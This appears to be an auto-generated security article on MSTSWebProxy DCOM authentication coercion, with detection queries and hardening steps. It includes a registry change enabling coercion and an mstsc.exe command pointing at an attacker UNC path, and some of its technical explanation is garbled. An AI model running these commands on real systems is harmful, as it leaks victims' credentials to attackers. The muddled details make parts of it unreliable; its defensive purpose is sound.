Listen to this Post

Introduction
A newly discovered DCOM object, MSTSWebProxy, has been identified as vulnerable to authentication coercion attacks. This technique allows adversaries to manipulate registry permissions and force remote execution via mstsc.exe. Understanding this exploit is critical for defenders to detect and mitigate potential abuse in enterprise environments.
Learning Objectives
- Learn how MSTSWebProxy coercion works and its prerequisites.
- Detect registry modifications tied to DCOM object abuse.
- Implement mitigations to block unauthorized authentication coercion.
1. Understanding MSTSWebProxy Coercion
Command:
reg add "HKCR\AppID{APPID}\" /v "InteractiveUser" /t REG_DWORD /d 1 /f
Steps:
- Adversaries modify the `InteractiveUser` registry key to enable coercion.
- The victim is tricked into executing `mstsc.exe` with a malicious UNC path (e.g.,
C:\windows\syswow64\mstsc.exe /edit \\attacker\payload). - The system authenticates the attacker’s payload under the victim’s context.
Detection:
- Monitor for unexpected `reg add` operations targeting
HKCR\AppID\. - Audit `mstsc.exe` launches with UNC paths.
2. Registry Hardening for DCOM Objects
Command:
reg add "HKCR\AppID{APPID}\" /v "AccessPermission" /t REG_BINARY /d [Secure ACL Hex] /f
Steps:
1. Identify vulnerable DCOM objects via `Get-CimInstance Win32_DCOMApplication`.
2. Restrict `AccessPermission` and `LaunchPermission` to authorized users.
- Use Microsoft Security Compliance Toolkit to deploy baseline policies.
Mitigation:
- Apply `Deny` ACEs (Access Control Entries) for untrusted users.
3. Detecting Coercion via Windows Event Logs
Query (KQL):
SecurityEvent | where EventID == 4688 | where CommandLine contains "mstsc.exe /edit"
Steps:
1. Enable Process Creation Auditing (Group Policy).
2. Alert on `mstsc.exe` executions with `/edit` flags.
4. Blocking UNC Path Execution
Group Policy:
[/bash]
Computer Configuration > Policies > Windows Settings > Security Options >
“Network Security: Restrict NTLM: Outgoing NTLM traffic” = “Deny All”
[bash]
Steps:
1. Disable NTLM fallback to prevent relay attacks.
2. Enforce SMB signing via GPO.
- Exploit Reproduction (Lab Testing)
Tool: RemoteMonologue PoC
Steps: - Clone the GitHub repository.
- Use `Test-MSTSWebProxyCoercion.ps1` to simulate attacks.
- Validate detection rules in a controlled environment.
What Undercode Say
– Key Takeaway 1: DCOM objects remain a high-risk vector due to legacy configurations. Prioritize registry hardening and ACL reviews.
– Key Takeaway 2: Detection hinges on auditing `mstsc.exe` and registry modifications.
Analysis:
The MSTSWebProxy exploit underscores the persistence of DCOM-based attacks in Windows ecosystems. While Microsoft has patched several coercion methods, misconfigurations and overprivileged accounts exacerbate risks. Enterprises must:
1. Inventory DCOM applications.
2. Segment networks to limit lateral movement.
3. Deploy endpoint detection for anomalous RDP-related activities.
Prediction
As DCOM hardening gains traction, adversaries will shift to lesser-known objects or abuse COM+ services. Proactive monitoring and zero-trust policies will be pivotal in mitigating future variants.
References:
– RemoteMonologue GitHub
– Microsoft DCOM Security Guidelines
IT/Security Reporter URL:
Reported By: Andrew Oliveau – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


